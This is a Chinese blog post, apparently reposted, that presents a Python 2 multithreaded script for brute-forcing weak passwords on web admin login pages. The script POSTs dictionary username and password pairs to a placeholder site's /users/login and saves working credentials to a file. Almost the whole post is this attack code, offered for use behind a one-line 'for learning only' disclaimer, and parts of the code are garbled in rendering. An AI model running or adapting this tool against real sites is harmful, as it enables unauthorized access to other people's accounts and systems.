python 写的http后台弱口令爆破工具

今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# -*- coding: utf-8 -*-
# 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
import  urllib2
import  urllib
import  httplib
import  threading
  
headers  =  { "Content-Type" : "application/x-www-form-urlencoded" ,     
            "Connection" : "Keep-Alive" ,
            "Referer" : "http://www.xxxxx.com/" }; # referer:是代理的访问来源地址
# lock = threading.Lock()
def  tryUser(user,password):
     #print user,password
     global  headers
     global  outFile 
     conn  =  httplib.HTTPConnection( "www.xxxxx.com" # 远程域名
     if  len (user) <  3 :      # 限制用户名长度,排除字典中的无用数据
         return   # 主动退出线程
     else :
         #lock.acquire()   # 多线程操作文件,提前加锁,用后释放
         #line = inFile.readline()
          
         #userData = line.strip().split(' # ') # strip() 默认去除空白字符包括' ','\t','\n'等
         #lock.release()
  
         user  =  user.strip()
         passwd  =  password.strip()
         params  =  urllib.urlencode({ 'username' : user,  'password' : passwd})
         conn.request(method = "POST" , url = "/users/login" , body = params, headers = headers)  # 后台路径
         responseText  =  conn.getresponse().read().decode( 'utf8' # 网页编码
         #print responseText  # 第一次可以打印看看是否解析
         if  not  responseText.find(u '用户名或者密码不正确,请重新输入!' ) >  0  :
             print  '----- find user:' , user,  'with password:' , passwd,  '-----'
             outFile.write(user  +  '    '  +   passwd  +  '\n' )
              
     return
  
outFile  =  open ( 'accounts-cracked.txt' 'w' )
  
if  __name__  = =  '__main__' :
     tsk = []  # 创建线程池
     with  open (r 'user.dic' 'r' ) as fUser:   # 使用with as 来打开文件,不需自己关闭文件,因为他会自己在合适的时候自已关闭(类似C# 中的using(...){}接口)
         with  open (r 'pass.dic' 'r' ) as fPass:
             for  user  in  fUser.readlines():
                 for  password  in  fPass.readlines():
                     t =  threading.Thread(target  =  tryUser,args = (user,password))
                     t.daemon  =  False  # 设置不进行进程守护
                     tsk.append(t)  # t.start()
                 fPass.seek( 0 )
                 # 记住这里要将文件重新移到文件首,不然就会出现只执行外层循环的第一条,因为内层在
                 # 迭代之后(readlines()是迭代器的形式,迭代一次后文件指针就指到文件尾了,迭代器
                 # 也是end了)第二次就没有password 在 fPass中,也就是说 for  password in fPass.readlines():
                 # 为空,所以这里的内层循环就不会被执行了,因此也就是迭代器清零的问题(C ++ itertor 常有)
                   
                      
# join()无参数就是完全阻塞主线程,等待线程执行完 有参数就是说,
# 在主线程等待一秒后就不阻塞线程了,继续执行主线程,这里的意思是一秒钟开一个线程
# 不能再thread start之前调用join(), 因为join() 是线程运行时调度
     for  in  tsk:
         t.start()
         t.join( 1
  
  
  
     print  "All thread OK,maybe not "
     outFile.close()

转载于:https://www.cnblogs.com/chenjingyi/p/5742014.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值